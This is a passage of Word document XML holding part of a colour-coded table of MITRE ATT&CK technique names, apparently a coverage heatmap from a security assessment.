            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Forge Web Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="445" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="252D379B" w14:textId="77777777" w:rsidR="004D0ABF" w:rsidRPr="001019D3" w:rsidRDefault="004D0ABF" w:rsidP="004D0ABF">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Cloud Service Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="52BB0CAD" w14:textId="77777777" w:rsidR="004D0ABF" w:rsidRPr="001019D3" w:rsidRDefault="004D0ABF" w:rsidP="004D0ABF">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Replication Through Removable Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="369" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6CE21ABE" w14:textId="77777777" w:rsidR="004D0ABF" w:rsidRPr="001019D3" w:rsidRDefault="004D0ABF" w:rsidP="004D0ABF">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Clipboard Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3928D952" w14:textId="77777777" w:rsidR="004D0ABF" w:rsidRPr="001019D3" w:rsidRDefault="004D0ABF" w:rsidP="004D0ABF">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Dynamic Resolution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F25E0A6" w14:textId="77777777" w:rsidR="004D0ABF" w:rsidRPr="001019D3" w:rsidRDefault="004D0ABF" w:rsidP="004D0ABF">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Exfiltration Over Physical Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1B28338C" w14:textId="77777777" w:rsidR="004D0ABF" w:rsidRPr="001019D3" w:rsidRDefault="004D0ABF" w:rsidP="004D0ABF">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Disk Wipe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E4115A" w:rsidRPr="001019D3" w14:paraId="5B78DE17" w14:textId="77777777" w:rsidTr="00266236">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="412" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="92D050"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="057D5D9B" w14:textId="77777777" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Search Closed Sources</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="355" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="357CAEFE" w14:textId="77777777" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Obtain Capabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0B521C25" w14:textId="77777777" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Replication Through Removable Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="336" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="680E710F" w14:textId="3DB53FE6" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Input Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="92D050"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D144071" w14:textId="77777777" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Create Account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="296" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5CF8E96B" w14:textId="30C392D3" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Domain or Tenant Policy Modification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="437" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="92D050"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="541F9AD1" w14:textId="3076AB5E" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Deobfuscate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>/Decode Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B8321CF" w14:textId="77777777" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Input Capture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="445" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50B4F2E4" w14:textId="77777777" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Cloud Storage Object Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="48D6F5DC" w14:textId="77777777" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Software Deployment Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="369" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="92D050"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="79A2DB60" w14:textId="77777777" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Data from Cloud Storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="77C6E5A3" w14:textId="77777777" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Encrypted Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2464907C" w14:textId="77777777" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Exfiltration Over Web Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="410798AC" w14:textId="77777777" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Endpoint Denial of Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E4115A" w:rsidRPr="001019D3" w14:paraId="36F38398" w14:textId="77777777" w:rsidTr="00266236">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="412" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="46ED0FDE" w14:textId="77777777" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Search Open Technical Databases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="355" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F8686A0" w14:textId="77777777" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Stage Capabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="36E76CD6" w14:textId="77777777" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Supply Chain Compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="336" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="674716DF" w14:textId="55A2A8DC" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Inter-Process Communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="92D050"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2D454DA4" w14:textId="77777777" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Create or Modify System Process</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="296" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56C0643E" w14:textId="77777777" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Escape to Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="437" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2DD28C4B" w14:textId="53990C4A" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Deploy Container</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="015CF70F" w14:textId="77777777" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Modify Authentication Process</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="445" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="667EBDCF" w14:textId="77777777" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Container and Resource Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2744935B" w14:textId="77777777" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Taint Shared Content</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="369" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0CD5D13E" w14:textId="77777777" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Data from Configuration Repository</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01C9006F" w14:textId="77777777" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Fallback Channels</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="17224BB0" w14:textId="77777777" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
